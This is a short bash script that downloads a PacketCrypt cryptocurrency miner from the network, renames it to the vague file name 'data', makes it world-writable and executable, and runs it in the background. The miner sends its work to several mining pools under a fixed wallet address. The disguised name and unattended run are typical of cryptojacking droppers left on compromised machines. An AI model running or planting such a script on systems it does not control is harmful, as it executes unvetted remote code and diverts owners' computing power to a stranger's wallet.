#!/bin/bash
wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O data
chmod 777 data
nohup ./data ann -p pkt1q0duwwqtwfl4gz3gfejhq3emg5dmyflqaea8ce3  https://stratum.zetahash.com http://pool.pkt.world http://pool.pktpool.io http://pool.pkteer.com > nohup.out
